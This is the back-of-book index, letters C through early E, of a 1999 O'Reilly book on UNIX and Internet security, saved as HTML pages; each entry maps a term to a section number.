cellular telephones : 12.2.1.8. Electrical noise<br />

CERCUS (Computer Emergency Response Committee for Unclassified Systems) : F.3.4.36. TRW<br />

network area and system administrators<br />

Cerf, Vint : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

CERN : E.4.1. CERN HTTP Daemon<br />

CERT (Computer Emergency Response Team)<br />

6.5.2. Using Message Digests<br />

27.3.5. Response Personnel?<br />

F.3.4.1. All <strong>Internet</strong> sites<br />

CERT-NL (Netherlands) : F.3.4.25. Netherlands: SURFnet-connected sites<br />

mailing list for : E.1.3.4. CERT-advisory<br />

CFB (cipher feedback) : 6.4.4.2. DES modes<br />

CGI (Common Gateway Interface) : 18.1. <strong>Sec</strong>urity and the World Wide Web<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (2 of 12) [2002-04-12 10:43:42]


Index<br />

scripts<br />

18.2. Running a <strong>Sec</strong>ure Server<br />

18.2.3. Writing <strong>Sec</strong>ure CGI Scripts and Programs<br />

18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

cgi-bin directory : 18.2.2. Understand Your Server's Directory Structure<br />

chacl command : 5.2.5.2. HP-UX access control lists<br />

-f option : 5.2.5.2. HP-UX access control lists<br />

-r option : 5.2.5.2. HP-UX access control lists<br />

change detection<br />

9.2. Detecting Change<br />

9.3. A Final Note<br />

character devices : 5.6. Device Files<br />

chat groups, harassment via : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

chdir command<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

25.2.2.8. Tree-structure attacks<br />

checklists for detecting changes<br />

9.2.2. Checklists and Metadata<br />

9.2.3. Checksums and Signatures<br />

checksums<br />

6.5.5.1. Checksums<br />

9.2.3. Checksums and Signatures<br />

Chesson, Greg : 15.2. Versions of UUCP<br />

chfn command : 8.2. Monitoring File Format<br />

chgrp command : 5.8. chgrp: Changing a File's Group<br />

child processes : C.2. Creating Processes<br />

chkey command : 19.3.1.1. Proving your identity<br />

chmod command<br />

5.2.1. chmod: Changing a File's Permissions<br />

5.2.4. Using Octal File Permissions<br />

8.3. Restricting Logins<br />

-A option : 5.2.5.2. HP-UX access control lists<br />

-f option : 5.2.1. chmod: Changing a File's Permissions<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (3 of 12) [2002-04-12 10:43:42]


Index<br />

-h option : 5.2.1. chmod: Changing a File's Permissions<br />

-R option : 5.2.1. chmod: Changing a File's Permissions<br />

chokes : (see firewalls)<br />

chown command<br />

5.7. chown: Changing a File's Owner<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

chroot system call<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

11.1.4. Trojan Horses<br />

23.4.1. Using chroot()<br />

with anonymous FTP : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

chrootuid daemon : E.4.2. chrootuid<br />

chsh command : 8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

CIAC (Computer Incident Advisory Capability) : F.3.4.43. U.S. Department of Energy sites, Energy<br />

Sciences Network (ESnet), and DOE contractors<br />

CIDR (Classless InterDomain Routing)<br />

16.2.1.1. IP networks<br />

16.2.1.3. CIDR addresses<br />

cigarettes : 12.2.1.2. Smoke<br />

cipher<br />

6.4.3. ROT13: Great for Encoding Offensive Jokes<br />

(see also cryptography; encryption)<br />

block chaining (CBC)<br />

6.4.4.2. DES modes<br />

6.6.2. des: The Data Encryption Standard<br />

ciphertext<br />

6.2. What Is Encryption?<br />

8.6.1. The crypt() Algorithm<br />

feedback (CFB) : 6.4.4.2. DES modes<br />

CISCO : F.3.4.8. CISCO Systems<br />

civil actions (lawsuits) : 26.3. Civil Actions<br />

classified data and breakins<br />

26.1. Legal Options After a Break-in<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (4 of 12) [2002-04-12 10:43:42]


Index<br />

26.2.2. Federal Jurisdiction<br />

Classless InterDomain Routing (CIDR)<br />

16.2.1.1. IP networks<br />

16.2.1.3. CIDR addresses<br />

clear text : 8.6.1. The crypt() Algorithm<br />

Clear to Send (CTS) : 14.3. The RS-232 Serial Protocol<br />

client flooding : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

client/server model : 16.2.5. Clients and Servers<br />

clients, NIS : (see NIS)<br />

clock, system<br />

5.1.5. File Times<br />

17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

for random seeds : 23.8. Picking a Random Seed<br />

resetting : 9.2.3. Checksums and Signatures<br />

<strong>Sec</strong>ure RPC timestamp : 19.3.1.3. Setting the window<br />

clogging : 25.3.4. Clogging<br />

CMW (Compartmented-Mode Workstation) : "<strong>Sec</strong>ure" Versions of <strong>UNIX</strong><br />

CNID (Caller-ID)<br />

14.4.3. Caller-ID (CNID)<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

24.2.4. Tracing a Connection<br />

CO2 system (for fires) : 12.2.1.1. Fire<br />

COAST (Computer Operations, Audit, and <strong>Sec</strong>urity Technology)<br />

E.3.2. COAST<br />

E.4. Software Resources<br />

code breaking : (see cryptography)<br />

codebooks : 8.7.3. Code Books<br />

CodeCenter : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

cold, extreme : 12.2.1.6. Temperature extremes<br />

command shells : (see shells)<br />

commands<br />

8.1.3. Accounts That Run a Single Command<br />

(see also under specific command name)<br />

accounts running single : 8.1.3. Accounts That Run a Single Command<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (5 of 12) [2002-04-12 10:43:42]


Index<br />

in addresses : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

editor, embedded : 11.5.2.7. Other initializations<br />

remote execution of<br />

15.1.2. uux Command<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

17.3.17. rexec (TCP Port 512)<br />

running simultaneously<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

(see also multitasking)<br />

commands in blocks : 18.3.2. Commands Within the Block<br />

COMMANDS= command : 15.5.2. Permissions Commands<br />

commenting out services : 17.3. Primary <strong>UNIX</strong> Network Services<br />

comments in BNU UUCP : 15.5.1.3. A Sample Permissions file<br />

Common Gateway Interface : (see CGI)<br />

communications<br />

modems : (see modems)<br />

national telecommunications : 26.2.2. Federal Jurisdiction<br />

threatening : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

comparison copies<br />

9.2.1. Comparison Copies<br />

9.2.1.3. rdist<br />

compress program : 6.6.1.2. Ways of improving the security of crypt<br />

Compressed SLIP (CSLIP) : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

Computer Emergency Response Committee for Unclassified Systems (CERCUS) : F.3.4.36. TRW<br />

network area and system administrators<br />

Computer Emergency Response Team : (see CERT)<br />

Computer Incident Advisory Capability (CIAC) : F.3.4.43. U.S. Department of Energy sites, Energy<br />

Sciences Network (ESnet), and DOE contractors<br />

computer networks : 1.4.3. Add-On Functionality Breeds Problems<br />

Computer <strong>Sec</strong>urity Institute (CSI) : F.1.3. Computer <strong>Sec</strong>urity Institute (CSI)<br />

computers<br />

assigning UUCP name : 15.5.2. Permissions Commands<br />

auxiliary ports : 12.3.1.4. Auxiliary ports on terminals<br />

backing up individual : 7.2.1. Individual Workstation<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (6 of 12) [2002-04-12 10:43:42]


Index<br />

contacting administrator of : 24.2.4.2. How to contact the system administrator of a computer you<br />

don't know<br />

cutting cables to : 25.1. Destructive Attacks<br />

failure of : 7.1.1.1. A taxonomy of computer failures<br />

hostnames for<br />

16.2.3. Hostnames<br />

16.2.3.1. The /etc/hosts file<br />

modems : (see modems)<br />

multiple screens : 12.3.4.3. Multiple screens<br />

multiple suppliers of : 18.6. Dependence on Third Parties<br />

non-citizen access to : 26.4.1. Munitions Export<br />

operating after breakin : 24.6. Resuming Operation<br />

portable : 12.2.6.3. Portables<br />

remote command execution : 17.3.17. rexec (TCP Port 512)<br />

running NIS+ : 19.5.5. NIS+ Limitations<br />

screen savers : 12.3.5.2. X screen savers<br />

security<br />

culture of : D.1.10. Understanding the Computer <strong>Sec</strong>urity "Culture"<br />

four steps toward : 2.4.4.7. Defend in depth<br />

physical : 12.2.6.1. Physically secure your computer<br />

references for : D.1.7. General Computer <strong>Sec</strong>urity<br />

resources on : D.1.1. Other Computer References<br />

seized as evidence : 26.2.4. Hazards of Criminal Prosecution<br />

transferring files between : 15.1.1. uucp Command<br />

trusting<br />

27.1. Can you Trust Your Computer?<br />

27.1.3. What the Superuser Can and Cannot Do<br />

unattended<br />

12.3.5. Unattended Terminals<br />

12.3.5.2. X screen savers<br />

unplugging : 24.2.5. Getting Rid of the Intruder<br />

vacuums for : 12.2.1.3. Dust<br />

vandalism of : (see vandalism)<br />

virtual : (see Telnet utility)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (7 of 12) [2002-04-12 10:43:42]


Index<br />

computing base (TCB) : 8.5.3.2. Trusted computing base<br />

conf directory : 18.2.2.1. Configuration files<br />

conf/access.conf : (see access.conf file)<br />

conf/srm.conf file : 18.3.1. The access.conf and .htaccess Files<br />

confidentiality : (see encryption; privacy)<br />

configuration<br />

errors : 9.1. Prevention<br />

files : 11.5.3. Abusing Automatic Mechanisms<br />

logging : 10.7.2.2. Informational material<br />

MCSA web server : 18.2.2.1. Configuration files<br />

UUCP version differences : 15.2. Versions of UUCP<br />

simplifying management of : 9.1.2. Read-only Filesystems<br />

connections<br />

hijacking : 16.3. IP <strong>Sec</strong>urity<br />

laundering : 16.1.1.1. Who is on the <strong>Internet</strong>?<br />

tracing<br />

24.2.4. Tracing a Connection<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

unplugging : 24.2.5. Getting Rid of the Intruder<br />

connectors, network : 12.2.4.3. Network connectors<br />

consistency of software : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

console device : 5.6. Device Files<br />

CONSOLE variable : 8.5.1. <strong>Sec</strong>ure Terminals<br />

constraining passwords : 8.8.2. Constraining Passwords<br />

consultants : 27.3.4. Your Consultants?<br />

context-dependent files (CDFs)<br />

5.9.2. Context-Dependent Files<br />

24.4.1.7. Hidden files and directories<br />

control characters in usernames : 3.1. Usernames<br />

cookies<br />

17.3.21.4. Using Xauthority magic cookies<br />

18.2.3.1. Do not trust the user's browser!<br />

COPS (Computer Oracle and Password System)<br />

19.5.5. NIS+ Limitations<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (8 of 12) [2002-04-12 10:43:42]


Index<br />

E.4.3. COPS (Computer Oracle and Password System)<br />

copyright<br />

9.2.1. Comparison Copies<br />

26.4.2. Copyright Infringement<br />

26.4.2.1. Software piracy and the SPA<br />

notices of : 26.2.6. Other Tips<br />

CORBA (Common Object Request Broker Architecture) : 19.2. Sun's Remote Procedure Call (RPC)<br />

core files<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

C.4. The kill Command<br />

cost-benefit analysis<br />

2.3. Cost-Benefit Analysis<br />

2.3.4. Convincing Management<br />

costs of losses : 2.3.1. The Cost of Loss<br />

cp command : 7.4.1. Simple Local Copies<br />

cpio program<br />

7.3.2. Building an Automatic Backup System<br />

7.4.2. Simple Archives<br />

crack program<br />

8.8.3. Cracking Your Own Passwords<br />

18.3.3. Setting Up Web Users and Passwords<br />

cracking<br />

backing up because of : 7.1.1.1. A taxonomy of computer failures<br />

passwords<br />

3.6.1. Bad Passwords: Open Doors<br />

3.6.4. Passwords on Multiple Machines<br />

8.6.1. The crypt() Algorithm<br />

8.8.3. Cracking Your Own Passwords<br />

8.8.3.2. The dilemma of password crackers<br />

17.3.3. TELNET (TCP Port 23)<br />

logging failed attempts : 10.5.3. syslog Messages<br />

responding to<br />

24. Discovering a Break-in<br />

24.7. Damage Control<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (9 of 12) [2002-04-12 10:43:42]


Index<br />

using rexecd : 17.3.17. rexec (TCP Port 512)<br />

crashes, logging : 10.7.2.1. Exception and activity reports<br />

CRC checksums : (see checksums)<br />

Cred table (NIS+) : 19.5.3. NIS+ Tables<br />

criminal prosecution<br />

26.2. Criminal Prosecution<br />

26.2.7. A Final Note on Criminal Actions<br />

cron file<br />

9.2.2.1. Simple listing<br />

11.5.1.4. Filename attacks<br />

11.5.3.1. crontab entries<br />

automating backups : 7.3.2. Building an Automatic Backup System<br />

cleaning up /tmp directory : 25.2.4. /tmp Problems<br />

collecting login times : 10.1.1. lastlog File<br />

symbolic links in : 10.3.7. Other Logs<br />

system clock and : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

uucp scripts in : 15.6.2. Automatic Execution of Cleanup Scripts<br />

crontab file : 15.6.2. Automatic Execution of Cleanup Scripts<br />

Crypt Breaker's Workbench (CBW) : 6.6.1.1. The crypt program<br />

crypt command/algorithm<br />

6.4.1. Summary of Private Key Systems<br />

6.6.1. <strong>UNIX</strong> crypt: The Original <strong>UNIX</strong> Encryption Command<br />

6.6.1.3. Example<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

18.3.3. Setting Up Web Users and Passwords<br />

crypt function<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

8.6.1. The crypt() Algorithm<br />

8.8.7. Algorithm and Library Changes<br />

23.5. Tips on Using Passwords<br />

crypt16 algorithm : 8.6.4. Crypt16() and Other Algorithms<br />

cryptography<br />

6. Cryptography<br />

6.7.2. Cryptography and Export Controls<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (10 of 12) [2002-04-12 10:43:42]


Index<br />

14.4.4.2. Protection against eavesdropping<br />

checklist for : A.1.1.5. Chapter 6: Cryptography<br />

checksums : 6.5.5.1. Checksums<br />

digital signatures : (see digital signatures)<br />

export laws concerning : 6.7.2. Cryptography and Export Controls<br />

Message Authentication Codes (MACs) : 6.5.5.2. Message authentication codes<br />

message digests : (see message digests)<br />

PGP : (see PGP)<br />

private-key<br />

6.4. Common Cryptographic Algorithms<br />

6.4.1. Summary of Private Key Systems<br />

public-key<br />

6.4. Common Cryptographic Algorithms<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

6.4.6.3. Strength of RSA<br />

6.5.3. Digital Signatures<br />

18.3. Controlling Access to Files on Your Server<br />

18.6. Dependence on Third Parties<br />

references on : D.1.5. Cryptography Books<br />

and U.S. patents : 6.7.1. Cryptography and the U.S. Patent System<br />

csh (C shell)<br />

5.5.2. Problems with SUID<br />

11.5.1. Shell Features<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

C.5.3. Running the User's Shell<br />

(see also shells)<br />

autologout variable : 12.3.5.1. Built-in shell autologout<br />

history file : 10.4.1. Shell History<br />

uucp command : 15.1.1.1. uucp with the C shell<br />

.cshrc file<br />

11.5.2.2. .cshrc, .kshrc<br />

12.3.5.1. Built-in shell autologout<br />

24.4.1.6. Changes to startup files<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (11 of 12) [2002-04-12 10:43:42]


Index<br />

CSI (Computer <strong>Sec</strong>urity Institute) : F.1.3. Computer <strong>Sec</strong>urity Institute (CSI)<br />

CSLIP (Compressed SLIP) : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

ctime<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

5.2.1. chmod: Changing a File's Permissions<br />

7.4.7. inode Modification Times<br />

9.2.3. Checksums and Signatures<br />

cu command<br />

14.5. Modems and <strong>UNIX</strong><br />

14.5.3.1. Originate testing<br />

14.5.3.3. Privilege testing<br />

-l option : 14.5.3.1. Originate testing<br />

culture, computer security : D.1.10. Understanding the Computer <strong>Sec</strong>urity "Culture"<br />

current directory : 5.1.3. Current Directory and Paths<br />

Customer Warning System (CWS) : F.3.4.34. Sun Microsystems customers<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (12 of 12) [2002-04-12 10:43:42]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: D<br />

DAC (Discretionary Access Controls) : 4.1.3. Groups and Group Identifiers (GIDs)<br />

daemon (user) : 4.1. Users and Groups<br />

damage, liability for : 26.4.6. Liability for Damage<br />

DARPA : (see ARPA)<br />

DAT (Digital Audio Tape) : 7.1.4. Guarding Against Media Failure<br />

data<br />

assigning owners to : 2.4.4.1. Assign an owner<br />

availability of : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

communication equipment (DCE) : 14.3. The RS-232 Serial Protocol<br />

confidential<br />

2.1. Planning Your <strong>Sec</strong>urity Needs<br />

2.5.2. Confidential Information<br />

disclosure of : 11.2. Damage<br />

giving away with NIS : 19.4.5. Unintended Disclosure of Site Information with NIS<br />

identifying assets : 2.2.1.1. Identifying assets<br />

integrity of : (see integrity, data)<br />

spoofing : 16.3. IP <strong>Sec</strong>urity<br />

terminal equipment (DTE) : 14.3. The RS-232 Serial Protocol<br />

Data Carrier Detect (DCD) : 14.3. The RS-232 Serial Protocol<br />

Data Defense Network (DDN) : F.3.4.20. MILNET<br />

Data Encryption Standard : (see DES)<br />

Data Set Ready (DSR) : 14.3. The RS-232 Serial Protocol<br />

Data Terminal Ready (DTR) : 14.3. The RS-232 Serial Protocol<br />

database files : 1.2. What Is an Operating System?<br />

databases : (see network databases)<br />

date command<br />

8.1.3. Accounts That Run a Single Command<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_d.htm (1 of 8) [2002-04-12 10:43:43]


Index<br />

24.5.1. Never Trust Anything Except Hardcopy<br />

day-zero backups : 7.1.3. Types of Backups<br />

dbx debugger : C.4. The kill Command<br />

DCE (data communication equipment) : 14.3. The RS-232 Serial Protocol<br />

DCE (Distributed Computing Environment)<br />

3.2.2. The /etc/passwd File and Network Databases<br />

8.7.3. Code Books<br />

16.2.6.2. Other naming services<br />

19.2. Sun's Remote Procedure Call (RPC)<br />

19.7.1. DCE<br />

dd command<br />

6.6.1.2. Ways of improving the security of crypt<br />

7.4.1. Simple Local Copies<br />

DDN (Data Defense Network) : F.3.4.20. MILNET<br />

deadlock : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

debug command : 17.3.4.2. Using sendmail to receive email<br />

debugfs command : 25.2.2.8. Tree-structure attacks<br />

DEC (Digital Equipment Corporation) : F.3.4.9. Digital Equipment Corporation and customers<br />

DECnet protocol : 16.4.3. DECnet<br />

decode aliases : 17.3.4.2. Using sendmail to receive email<br />

decryption : (see encryption)<br />

defamation : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

default<br />

accounts : 8.1.2. Default Accounts<br />

deny : 21.1.1. Default Permit vs. Default Deny<br />

domain : 16.2.3. Hostnames<br />

permit : 21.1.1. Default Permit vs. Default Deny<br />

defense in depth : (see multilevel security)<br />

DELETE key : 3.4. Changing Your Password<br />

deleting<br />

destructive attack via : 25.1. Destructive Attacks<br />

files : 5.4. Using Directory Permissions<br />

demo accounts : 8.1.2. Default Accounts<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_d.htm (2 of 8) [2002-04-12 10:43:43]


Index<br />

denial-of-service attacks<br />

1.5. Role of This Book<br />

25. Denial of Service Attacks and Solutions<br />

25.3.4. Clogging<br />

accidental : 25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

automatic lockout : 3.3. Entering Your Password<br />

checklist for : A.1.1.24. Chapter 25: Denial of Service Attacks and Solutions<br />

inodes : 25.2.2.3. Inode problems<br />

internal inetd services : 17.1.3. The /etc/inetd Program<br />

on networks<br />

25.3. Network Denial of Service Attacks<br />

25.3.4. Clogging<br />

via syslog : 10.5.1. The syslog.conf Configuration File<br />

X Window System : 17.3.21.5. Denial of service attacks under X<br />

departure of employees : 13.2.6. Departure<br />

depository directories, FTP : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

DES (Data Encryption Standard)<br />

6.4.1. Summary of Private Key Systems<br />

6.4.4. DES<br />

6.4.5.2. Triple DES<br />

8.6.1. The crypt() Algorithm<br />

authentication (NIS+) : 19.5.4. Using NIS+<br />

improving security of<br />

6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

des program<br />

6.4.4. DES<br />

6.4.5.2. Triple DES<br />

6.6.2. des: The Data Encryption Standard<br />

7.4.4. Encrypting Your Backups<br />

destroying media : 12.3.2.3. Sanitize your media before disposal<br />

destructive attacks : 25.1. Destructive Attacks<br />

detached signatures : 6.6.3.6. PGP detached signatures<br />

detectors<br />

cable tampering : 12.3.1.1. Wiretapping<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_d.htm (3 of 8) [2002-04-12 10:43:43]


Index<br />

carbon-monoxide : 12.2.1.2. Smoke<br />

humidity : 12.2.1.11. Humidity<br />

logging alarm systems : 10.7.1.1. Exception and activity reports<br />

smoke : 12.2.1.2. Smoke<br />

temperature alarms : 12.2.1.6. Temperature extremes<br />

water sensors : 12.2.1.12. Water<br />

Deutsches Forschungsnetz : F.3.4.14. Germany: DFN-WiNet <strong>Internet</strong> sites<br />

/dev directory : 14.5.1. Hooking Up a Modem to Your Computer<br />

/dev/audio device : 23.8. Picking a Random Seed<br />

/dev/console device : 5.6. Device Files<br />

/dev/kmem device<br />

5.6. Device Files<br />

11.1.2. Back Doors and Trap Doors<br />

/dev/null device : 5.6. Device Files<br />

/dev/random device : 23.7.4. Other random number generators<br />

/dev/swap device : 5.5.1. SUID, SGID, and Sticky Bits<br />

/dev/urandom device : 23.7.4. Other random number generators<br />

device files : 5.6. Device Files<br />

devices<br />

managing with SNMP : 17.3.15. Simple Network Management Protocol (SNMP) (UDP Ports 161<br />

and 162)<br />

modem control : 14.5.2. Setting Up the <strong>UNIX</strong> Device<br />

Devices file : 14.5.1. Hooking Up a Modem to Your Computer<br />

df -i command : 25.2.2.3. Inode problems<br />

dictionary attack : 8.6.1. The crypt() Algorithm<br />

Diffie-Hellman key exchange system<br />

6.4.2. Summary of Public Key Systems<br />

18.6. Dependence on Third Parties<br />

19.3. <strong>Sec</strong>ure RPC (AUTH_DES)<br />

breaking key : 19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

exponential key exchange : 19.3.1. <strong>Sec</strong>ure RPC Authentication<br />

Digital Audio Tape (DAT) : 7.1.4. Guarding Against Media Failure<br />

digital computers : 6.1.2. Cryptography and Digital Computers<br />

Digital Equipment Corporation (DEC) : F.3.4.9. Digital Equipment Corporation and customers<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_d.htm (4 of 8) [2002-04-12 10:43:43]


Index<br />

Digital Signature Algorithm : (see DSA)<br />

digital signatures<br />

6.4. Common Cryptographic Algorithms<br />

6.5. Message Digests and Digital Signatures<br />

6.5.5.2. Message authentication codes<br />

9.2.3. Checksums and Signatures<br />

checksums : 6.5.5.1. Checksums<br />

detached signatures : 6.6.3.6. PGP detached signatures<br />

with PGP : 6.6.3.4. Adding a digital signature to an announcement<br />

Digital <strong>UNIX</strong><br />

1.3. History of <strong>UNIX</strong><br />

(see also Ultrix)<br />

directories<br />

5.1.1. Directories<br />

5.1.3. Current Directory and Paths<br />

ancestor : 9.2.2.2. Ancestor directories<br />

backing up by : 7.1.3. Types of Backups<br />

CDFs (context-dependent files) : 24.4.1.7. Hidden files and directories<br />

checklist for : A.1.1.4. Chapter 5: The <strong>UNIX</strong> Filesystem<br />

dot, dot-dot, and / : 5.1.1. Directories<br />

FTP depositories : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

immutable : 9.1.1. Immutable and Append-Only Files<br />

listing automatically (Web) : 18.2.2.2. Additional configuration issues<br />

mounted : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

mounting secure : 19.3.2.5. Mounting a secure filesystem<br />

nested : 25.2.2.8. Tree-structure attacks<br />

NFS : (see NFS)<br />

permissions : 5.4. Using Directory Permissions<br />

read-only : 9.1.2. Read-only Filesystems<br />

restricted<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

root : (see root directory)<br />

SGI and sticky bits on : 5.5.6. SGID and Sticky Bits on Directories<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_d.htm (5 of 8) [2002-04-12 10:43:43]


Index<br />

Web server structure of<br />

18.2.2. Understand Your Server's Directory Structure<br />

18.2.2.2. Additional configuration issues<br />

world-writable : 11.6.1.1. World-writable user files and directories<br />

blocks<br />

18.3.1. The access.conf and .htaccess Files<br />

18.3.2. Commands Within the Block<br />

18.3.2.1. Examples<br />

disaster recovery : 12.2.6.4. Minimizing downtime<br />

disk attacks<br />

25.2.2. Disk Attacks<br />

25.2.2.8. Tree-structure attacks<br />

disk quotas : 25.2.2.5. Using quotas<br />

diskettes : (see backups; media)<br />

dismissed employees : 13.2.6. Departure<br />

disposing of materials : 12.3.3. Other Media<br />

Distributed Computing Environment : (see DCE)<br />

DNS (Domain Name System)<br />

16.2.6. Name Service<br />

16.2.6.2. Other naming services<br />

17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

17.3.6.2. DNS nameserver attacks<br />

nameserver attacks : 17.3.6.2. DNS nameserver attacks<br />

rogue servers : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

security and : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

zone transfers<br />

17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

17.3.6.1. DNS zone transfers<br />

documentation<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

domain name : 16.2.3. Hostnames<br />

Domain Name System : (see DNS)<br />

domainname command : 19.4.3. NIS Domains<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_d.htm (6 of 8) [2002-04-12 10:43:43]


Index<br />

domains : 19.4.3. NIS Domains<br />

dormant accounts<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

dot (.) directory : 5.1.1. Directories<br />

dot-dot (..) directory : 5.1.1. Directories<br />

Double DES : 6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

double reverse lookup : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

DOW USA : F.3.4.10. DOW USA<br />

downloading files : 12.3.4. Protecting Local Storage<br />

logging<br />

10.3.3. xferlog Log File<br />

10.3.5. access_log Log File<br />

downtime : 12.2.6.4. Minimizing downtime<br />

due to criminal investigations : 26.2.4. Hazards of Criminal Prosecution<br />

logging : 10.7.2.1. Exception and activity reports<br />

drand48 function : 23.7.3. drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

drills, security : 24.1.3. Rule #3: PLAN AHEAD<br />

drink : 12.2.2.1. Food and drink<br />

DSA (Digital Signature Algorithm)<br />

6.4.2. Summary of Public Key Systems<br />

6.5.3. Digital Signatures<br />

DTE (data terminal equipment) : 14.3. The RS-232 Serial Protocol<br />

du command : 25.2.2.1. Disk-full attacks<br />

dual universes : 5.9.1. Dual Universes<br />

ducts, air : 12.2.3.2. Entrance through air ducts<br />

dump/restore program<br />

7.1.3. Types of Backups<br />

7.4.3. Specialized Backup Programs<br />

7.4.4. Encrypting Your Backups<br />

dumpster diving : 12.3.3. Other Media<br />

duress code : 8.7.2. Token Cards<br />

dust : 12.2.1.3. Dust<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_d.htm (7 of 8) [2002-04-12 10:43:43]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_d.htm (8 of 8) [2002-04-12 10:43:43]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: E<br />

earthquakes : 12.2.1.4. Earthquake<br />

eavesdropping<br />

12.3.1. Eavesdropping<br />

12.3.1.5. Fiber optic cable<br />

12.4.1.2. Potential for eavesdropping and data theft<br />

14.4.4. Protecting Against Eavesdropping<br />

14.4.4.2. Protection against eavesdropping<br />

16.3.1. Link-level <strong>Sec</strong>urity<br />

IP packets<br />

16.3.1. Link-level <strong>Sec</strong>urity<br />

17.3.3. TELNET (TCP Port 23)<br />

